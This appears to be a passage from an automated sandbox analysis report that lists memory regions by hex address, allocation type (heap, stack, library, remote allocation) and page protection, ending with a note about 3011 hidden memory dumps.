trusted library allocation
page read and write
7CC0000
unkown
page read and write
8D90000
unkown
page read and write
8C60000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
18199E4F000
heap
page read and write
8C7F000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
6D65000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
9DED000
trusted library allocation
page read and write
6DA0000
trusted library allocation
page read and write
6C40000
trusted library allocation
page execute and read and write
987000
heap
page read and write
8AB0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
A1A000
heap
page read and write
7266000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
48B7000
trusted library allocation
page execute and read and write
8C57000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
271AC650000
trusted library allocation
page read and write
9CF1000
trusted library allocation
page read and write
271AC520000
trusted library allocation
page read and write
5BEF000
stack
page read and write
6F40000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
8AF0000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
A060000
trusted library allocation
page read and write
7CC5000
unkown
page read and write
18199E00000
heap
page read and write
8C30000
trusted library allocation
page read and write
91B0000
unkown
page read and write
91A0000
trusted library allocation
page read and write
2437CC13000
heap
page read and write
6BC0000
trusted library allocation
page read and write
8C68000
trusted library allocation
page read and write
8DD6000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
C7F000
stack
page read and write
5728000
heap
page read and write
4876000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
CC0000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
8AA0000
trusted library allocation
page read and write
2437CC5E000
heap
page read and write
91B0000
unkown
page read and write
9D07000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
8FE2000
trusted library allocation
page read and write
9010000
trusted library allocation
page read and write
B0F5000
trusted library allocation
page read and write
9130000
unkown
page read and write
8F60000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
523F000
heap
page read and write
A5A0F7F000
stack
page read and write
8AD5000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page read and write
7E68000
trusted library allocation
page read and write
5470000
remote allocation
page read and write
9050000
trusted library allocation
page read and write
3709BFE000
stack
page read and write
1F65E451000
heap
page read and write
8C60000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
91B0000
unkown
page read and write
20A95E5C000
heap
page read and write
100B7E000
stack
page read and write
B107000
trusted library allocation
page read and write
8C65000
trusted library allocation
page read and write
1A051820000
heap
page read and write
8CC0000
trusted library allocation
page read and write
50B0000
heap
page read and write
9D5E000
stack
page read and write
8AD0000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
8C70000
unkown
page read and write
A5A137F000
stack
page read and write
5757000
heap
page read and write
8D70000
trusted library allocation
page read and write
50C0000
trusted library allocation
page read and write
8AA0000
trusted library allocation
page read and write
271AC790000
remote allocation
page read and write
4867000
trusted library allocation
page read and write
7EE5000
trusted library allocation
page read and write
7ED0000
unkown
page read and write
5156000
trusted library allocation
page read and write
8E65000
trusted library allocation
page read and write
8CF0000
trusted library allocation
page read and write
271AC790000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
3709AFC000
stack
page read and write
9210000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
1343EFF000
stack
page read and write
CD0000
trusted library allocation
page read and write
8DA0000
trusted library allocation
page read and write
8C98000
trusted library allocation
page read and write
271A8483000
trusted library allocation
page read and write
9D00000
trusted library allocation
page read and write
9270000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
8AB0000
unkown
page read and write
7E70000
trusted library allocation
page read and write
6BF0000
direct allocation
page read and write
7EC6000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
9CC0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
8C00000
trusted library allocation
page read and write
51A3000
trusted library allocation
page read and write
8C00000
trusted library allocation
page read and write
B22E000
trusted library allocation
page read and write
ACF0000
trusted library allocation
page execute and read and write
8C50000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
7EF5000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
271A7013000
heap
page read and write
8F00000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
C30000
heap
page read and write
9E38000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
9E0C000
trusted library allocation
page read and write
BB6000
heap
page read and write
26B607F000
stack
page read and write
9C90000
trusted library allocation
page read and write
8AA0000
unkown
page read and write
8AD5000
trusted library allocation
page read and write
2DEB000
heap
page read and write
9CC0000
trusted library allocation
page read and write
BBB000
stack
page read and write
6CA0000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
242CDD2B000
heap
page read and write
9DEF000
trusted library allocation
page read and write
6BC0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
1A051B00000
heap
page read and write
8E40000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
91CE000
trusted library allocation
page read and write
8C65000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
271AC8F9000
heap
page read and write
8C20000
trusted library allocation
page read and write
7E0A000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page execute and read and write
9200000
trusted library allocation
page read and write
8DD0000
trusted library allocation
page read and write
271A8100000
trusted library section
page readonly
8E60000
trusted library allocation
page read and write
6E0000
remote allocation
page read and write
7E70000
trusted library allocation
page read and write
9020000
trusted library allocation
page read and write
529C000
heap
page read and write
6DC0000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
4876000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
47EF7F7000
stack
page read and write
8EB0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
8C75000
trusted library allocation
page read and write
6D10000
trusted library allocation
page read and write
1FDF423E000
heap
page read and write
8AB0000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
7ED7000
unkown
page read and write
6D00000
trusted library allocation
page read and write
91A0000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
7DD0000
trusted library allocation
page read and write
4876000
trusted library allocation
page read and write
A5CE000
stack
page read and write
9CCD000
trusted library allocation
page read and write
960000
unkown
page read and write
8E90000
trusted library allocation
page read and write
9C90000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
7EE0000
unkown
page read and write
6D20000
trusted library allocation
page read and write
271A7058000
heap
page read and write
8AB0000
trusted library allocation
page execute and read and write
7CC0000
trusted library allocation
page read and write
7C60000
trusted library allocation
page read and write
271AC510000
trusted library allocation
page read and write
4D7C000
stack
page read and write
7C90000
trusted library allocation
page read and write
8D95000
trusted library allocation
page read and write
8F80000
trusted library allocation
page read and write
7F10000
unkown
page read and write
AF01000
trusted library allocation
page read and write
18199E75000
heap
page read and write
8A1000
heap
page read and write
8E90000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
7D0000
trusted library allocation
page read and write
8DA6000
trusted library allocation
page read and write
8C3A000
trusted library allocation
page read and write
100A7D000
stack
page read and write
8AC6000
trusted library allocation
page read and write
53ED000
stack
page read and write
B8F4E7A000
stack
page read and write
8C10000
trusted library allocation
page read and write
8CD0000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
B3D8000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
9175000
trusted library allocation
page read and write
6C10000
trusted library allocation
page read and write
9CD0000
trusted library allocation
page read and write
4F90000
direct allocation
page read and write
35C000
stack
page read and write
8AD0000
trusted library allocation
page read and write
6D00000
trusted library allocation
page read and write
6D00000
trusted library allocation
page read and write
435000
unkown
page read and write
56F8000
heap
page read and write
5299000
heap
page read and write
18199F00000
heap
page read and write
B307000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
9D40000
trusted library allocation
page read and write
242CDCE0000
heap
page read and write
870000
heap
page read and write
9CC0000
trusted library allocation
page read and write
A050000
trusted library allocation
page read and write
6F40000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
2437CC61000
heap
page read and write
8D70000
unkown
page read and write
9070000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
6DE0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
20A95D50000
heap
page read and write
5470000
remote allocation
page read and write
8560000
unkown
page read and write
9CC0000
trusted library allocation
page read and write
703E000
stack
page read and write
8F10000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
7D60000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
8ED5000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
1F65E44A000
heap
page read and write
8F00000
trusted library allocation
page read and write
78A0000
trusted library allocation
page read and write
90C0000
trusted library allocation
page read and write
9250000
trusted library allocation
page read and write
50F6000
trusted library allocation
page read and write
6D60000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
48E000
stack
page read and write
8C85000
trusted library allocation
page read and write
54C1000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
4871000
trusted library allocation
page read and write
8AB0000
unkown
page read and write
8C30000
trusted library allocation
page read and write
7E50000
trusted library allocation
page read and write
9180000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
271A7113000
heap
page read and write
5048000
heap
page read and write
20A95E6A000
heap
page read and write
2437CA90000
heap
page read and write
7EE0000
trusted library allocation
page read and write
9D50000
trusted library allocation
page read and write
7ED5000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
4F80000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
9CD0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
6CF0000
trusted library allocation
page read and write
9CF4000
trusted library allocation
page read and write
9D30000
trusted library allocation
page read and write
6D29000
trusted library allocation
page read and write
5020000
heap
page read and write
D63000
heap
page read and write
9CC0000
trusted library allocation
page read and write
B20F000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
6B40000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
5150000
heap
page read and write
91B0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8C75000
unkown
page read and write
8C60000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
20A95E02000
heap
page read and write
8C90000
trusted library allocation
page read and write
4ACD000
stack
page read and write
8EC0000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
878000
heap
page read and write
7EB0000
trusted library allocation
page read and write
7E15000
trusted library allocation
page read and write
7EC0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
1FDF4265000
heap
page read and write
7EB0000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
6B70000
trusted library allocation
page read and write
577F000
heap
page read and write
91A0000
trusted library allocation
page read and write
6D90000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
9DD8000
trusted library allocation
page read and write
7E70000
trusted library allocation
page read and write
271AC780000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
B2F4000
trusted library allocation
page read and write
8D75000
trusted library allocation
page read and write
D64000
heap
page read and write
8C35000
trusted library allocation
page read and write
3106000
heap
page read and write
242CEAA0000
unkown
page read and write
271A7041000
heap
page read and write
8C40000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
1F65E470000
heap
page read and write
8F60000
trusted library allocation
page read and write
7E08000
trusted library allocation
page read and write
8C50000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
8E60000
trusted library allocation
page read and write
AE7E000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
6BB0000
trusted library allocation
page read and write
271A7800000
heap
page read and write
8FDE000
stack
page read and write
5769000
heap
page read and write
B070000
trusted library allocation
page read and write
6D00000
trusted library allocation
page read and write
53F1000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
BD1C000
trusted library allocation
page read and write
8D00000
trusted library allocation
page read and write
8F90000
trusted library allocation
page read and write
8E60000
trusted library allocation
page read and write
8E7000
heap
page read and write
91E9000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
47EF1BB000
stack
page read and write
5A6000
heap
page read and write
90F0000
trusted library allocation
page read and write
9E21000
trusted library allocation
page read and write
7E12000
trusted library allocation
page read and write
B150000
trusted library allocation
page read and write
271AC813000
heap
page read and write
8E90000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
47EF6FB000
stack
page read and write
8C60000
trusted library allocation
page read and write
1343B7F000
stack
page read and write
7E70000
trusted library allocation
page read and write
AF20000
trusted library allocation
page read and write
7C0C000
trusted library allocation
page read and write
7E50000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
271AC670000
trusted library allocation
page read and write
4876000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page read and write
C2E000
stack
page read and write
9081000
trusted library allocation
page read and write
7EE5000
unkown
page read and write
5769000
heap
page read and write
7E60000
trusted library allocation
page read and write
48A1000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
52AF000
heap
page read and write
7EA0000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
6B70000
trusted library allocation
page read and write
7E90000
trusted library allocation
page execute and read and write
7ED0000
trusted library allocation
page read and write
271AD000000
heap
page read and write
8C10000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
6D60000
trusted library allocation
page read and write
A5A0E7A000
stack
page read and write
8E90000
trusted library allocation
page read and write
7C40000
trusted library allocation
page execute and read and write
8E40000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
577C000
heap
page read and write
8AB0000
trusted library allocation
page read and write
7ED0000
trusted library allocation
page read and write
8E95000
trusted library allocation
page read and write
5DEF000
stack
page read and write
90E0000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
5B48000
trusted library allocation
page read and write
8E60000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
1FDF42CC000
heap
page read and write
7EC0000
trusted library allocation
page read and write
8C70000
unkown
page read and write
9210000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
9060000
trusted library allocation
page read and write
9CB0000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page read and write
8FF0000
trusted library allocation
page read and write
2437CC5C000
heap
page read and write
7C50000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
78A0000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
1B09F1A0000
remote allocation
page read and write
271A80C0000
trusted library section
page readonly
1008FE000
stack
page read and write
B255000
trusted library allocation
page read and write
2437CC02000
heap
page read and write
540E000
trusted library allocation
page read and write
1F65E44D000
heap
page read and write
9C90000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
B190000
trusted library allocation
page read and write
26B617C000
stack
page read and write
9030000
trusted library allocation
page read and write
2DD0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
1FDF41C0000
trusted library allocation
page read and write
B8F49AB000
stack
page read and write
D94000
heap
page read and write
7045000
trusted library allocation
page read and write
9D00000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
29F0000
unkown
page readonly
9DEC000
trusted library allocation
page read and write
6CE0000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
50B5000
trusted library allocation
page read and write
9090000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
8F80000
trusted library allocation
page read and write
489D000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
9130000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
B3D0000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
8F90000
trusted library allocation
page read and write
8FD0000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
4871000
trusted library allocation
page read and write
271AC63E000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
8D75000
trusted library allocation
page read and write
8E70000
trusted library allocation
page read and write
1FDF42BB000
heap
page read and write
9CC0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
B0C0000
trusted library allocation
page read and write
490B000
trusted library allocation
page read and write
9D60000
trusted library allocation
page read and write
7CC8000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
2437CC69000
heap
page read and write
950000
unkown
page readonly
8EF0000
trusted library allocation
page read and write
9D10000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
47EF9FD000
stack
page read and write
6BC0000
trusted library allocation
page read and write
5B46000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
B094000
trusted library allocation
page read and write
1B09EC5C000
heap
page read and write
8AD0000
trusted library allocation
page read and write
4840000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
4907000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
7EE0000
unkown
page read and write
8C20000
trusted library allocation
page read and write
7268000
trusted library allocation
page read and write
7C80000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
AE56000
trusted library allocation
page read and write
8F15000
trusted library allocation
page read and write
5291000
heap
page read and write
6F80000
trusted library allocation
page read and write
5268000
heap
page read and write
5F10000
direct allocation
page read and write
6C60000
trusted library allocation
page read and write
2437CC42000
heap
page read and write
8F00000
trusted library allocation
page read and write
4B6A000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
7EB1000
trusted library allocation
page read and write
6CA0000
heap
page read and write
A1A000
heap
page read and write
B3EE000
trusted library allocation
page read and write
8C70000
unkown
page read and write
90F5000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
9CE0000
trusted library allocation
page read and write
A09D000
stack
page read and write
6BC0000
trusted library allocation
page read and write
91196FB000
stack
page read and write
8D70000
trusted library allocation
page read and write
7CC7000
unkown
page read and write
9C90000
trusted library allocation
page read and write
8ED8000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
8C25000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
30000
heap
page read and write
908D000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
B045000
trusted library allocation
page read and write
7E90000
trusted library allocation
page read and write
5295000
trusted library allocation
page read and write
271A708B000
heap
page read and write
271A7B01000
trusted library allocation
page read and write
8FE000
heap
page read and write
8D70000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
565E000
stack
page read and write
7F10000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
B033000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
489D000
trusted library allocation
page execute and read and write
5302000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
5B95000
trusted library allocation
page read and write
577C000
heap
page read and write
B068000
trusted library allocation
page read and write
A5A0D79000
stack
page read and write
4F92000
direct allocation
page read and write
7040000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
9000000
trusted library allocation
page read and write
9CC0000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
5115000
trusted library allocation
page read and write
DBB000
heap
page read and write
9CF0000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
8C10000
trusted library allocation
page read and write
5299000
heap
page read and write
4DE000
stack
page read and write
7CC0000
trusted library allocation
page read and write
B0FE000
trusted library allocation
page read and write
8C90000
trusted library allocation
page read and write
AE8A000
trusted library allocation
page read and write
9CF0000
trusted library allocation
page read and write
7C80000
trusted library allocation
page read and write
7C70000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
5B42000
trusted library allocation
page read and write
9190000
trusted library allocation
page read and write
26B62FE000
stack
page read and write
9E21000
trusted library allocation
page read and write
47EF47F000
stack
page read and write
8E90000
trusted library allocation
page read and write
1A052002000
trusted library allocation
page read and write
26B657D000
stack
page read and write
8BF0000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
9240000
trusted library allocation
page read and write
48B5000
trusted library allocation
page execute and read and write
9270000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
1B09EC00000
heap
page read and write
8AD0000
trusted library allocation
page read and write
7E0F000
trusted library allocation
page read and write
2437CC00000
heap
page read and write
83E000
stack
page read and write
8C60000
trusted library allocation
page read and write
5250000
heap
page read and write
8DF0000
trusted library allocation
page read and write
B2FC000
trusted library allocation
page read and write
6DF0000
trusted library allocation
page read and write
7BFF000
trusted library allocation
page read and write
8F51000
trusted library allocation
page read and write
5E32000
direct allocation
page read and write
7EB0000
trusted library allocation
page read and write
8C30000
trusted library allocation
page read and write
4884000
trusted library allocation
page read and write
20FB9243000
heap
page read and write
7E80000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
408000
unkown
page readonly
3121000
trusted library allocation
page read and write
B317000
trusted library allocation
page read and write
8F30000
trusted library allocation
page read and write
271AC660000
trusted library allocation
page read and write
BE0000
trusted library section
page read and write
370A2FD000
stack
page read and write
8C30000
trusted library allocation
page read and write
271A7054000
heap
page read and write
90D0000
trusted library allocation
page read and write
271A708D000
heap
page read and write
9CF0000
trusted library allocation
page read and write
AECB000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
2437CC5A000
heap
page read and write
8F10000
trusted library allocation
page read and write
B2D5000
trusted library allocation
page read and write
8F70000
trusted library allocation
page read and write
20D000
stack
page read and write
8E40000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
42C000
unkown
page read and write
18199E81000
heap
page read and write
271AC8E1000
heap
page read and write
8EF0000
trusted library allocation
page read and write
BD0000
heap
page read and write
9DD6000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
9D00000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8FE0000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
1F65E502000
heap
page read and write
577C000
heap
page read and write
546C000
stack
page read and write
88A000
heap
page read and write
576D000
heap
page read and write
7D90000
trusted library allocation
page read and write
18199D50000
heap
page read and write
7E90000
trusted library allocation
page read and write
8AC0000
trusted library allocation
page read and write
242CDC70000
heap
page read and write
7E60000
trusted library allocation
page read and write
18199E13000
heap
page read and write
8C60000
trusted library allocation
page read and write
9DA3000
trusted library allocation
page read and write
7D50000
trusted library allocation
page read and write
9D40000
trusted library allocation
page read and write
A5A177E000
stack
page read and write
5752000
heap
page read and write
8C60000
trusted library allocation
page read and write
8C50000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
8C35000
trusted library allocation
page read and write
AFD5000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
91A4000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
4B20000
heap
page read and write
8CB0000
trusted library allocation
page read and write
8D00000
trusted library allocation
page read and write
6F30000
trusted library allocation
page execute and read and write
9CC0000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
271AC862000
heap
page read and write
8E95000
trusted library allocation
page read and write
9E5B000
trusted library allocation
page read and write
7EE5000
trusted library allocation
page read and write
AF68000
trusted library allocation
page read and write
1F65E250000
heap
page read and write
4AF0000
heap
page execute and read and write
9DDD000
trusted library allocation
page read and write
10097B000
stack
page read and write
7E70000
trusted library allocation
page read and write
9D00000
trusted library allocation
page read and write
8E70000
trusted library allocation
page read and write
9D30000
trusted library allocation
page read and write
8E50000
trusted library allocation
page read and write
1B09E9A0000
heap
page read and write
9170000
unkown
page read and write
8C60000
trusted library allocation
page read and write
8C90000
trusted library allocation
page read and write
2D7D000
stack
page read and write
370A0F7000
stack
page read and write
B8F4F79000
stack
page read and write
271AC84C000
heap
page read and write
8C40000
trusted library allocation
page read and write
8F60000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
7CC3000
unkown
page read and write
5372000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
8F10000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
271A7069000
heap
page read and write
6B80000
trusted library allocation
page execute and read and write
8FF0000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
18199DB0000
heap
page read and write
8AC5000
trusted library allocation
page read and write
9DF9000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
8C76000
trusted library allocation
page read and write
8C50000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
AE73000
trusted library allocation
page read and write
6F30000
trusted library allocation
page read and write
271AC8F3000
heap
page read and write
8AD0000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
59EE000
stack
page read and write
9CE0000
trusted library allocation
page read and write
6E10000
trusted library allocation
page read and write
7F10000
trusted library allocation
page read and write
7C40000
trusted library allocation
page read and write
271AC630000
trusted library allocation
page read and write
271A704F000
heap
page read and write
DE7000
heap
page read and write
8E40000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
7CC0000
unkown
page read and write
242CEA80000
unkown
page read and write
5082000
trusted library allocation
page read and write
5730000
heap
page read and write
8D70000
trusted library allocation
page read and write
8AD0000
trusted library allocation
page read and write
47C0000
heap
page read and write
8AB0000
unkown
page read and write
8F20000
trusted library allocation
page read and write
8F00000
trusted library allocation
page read and write
7EB0000
trusted library allocation
page read and write
7E60000
trusted library allocation
page read and write
1FDF42E2000
heap
page read and write
7C70000
trusted library allocation
page read and write
2437CC3D000
heap
page read and write
5F70000
heap
page read and write
9210000
trusted library allocation
page read and write
B07A000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
510000
heap
page read and write
8AD0000
trusted library allocation
page read and write
8C20000
trusted library allocation
page read and write
8BAE000
stack
page read and write
1B09ED02000
heap
page read and write
20A95E00000
heap
page read and write
8E40000
trusted library allocation
page read and write
7EE0000
trusted library allocation
page read and write
6D10000
trusted library allocation
page read and write
8F20000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
7E80000
trusted library allocation
page read and write
8AB0000
trusted library allocation
page read and write
90AF000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
6D20000
trusted library allocation
page read and write
12BE6FB000
stack
page read and write
B0B8000
trusted library allocation
page read and write
271A7913000
heap
page read and write
9200000
trusted library allocation
page read and write
8CC0000
trusted library allocation
page read and write
3106000
heap
page read and write
6E00000
trusted library allocation
page read and write
380000
remote allocation
page read and write
91B0000
unkown
page read and write
20FB8FC0000
heap
page read and write
6D10000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
There are 3011 hidden memdumps, click here to show them.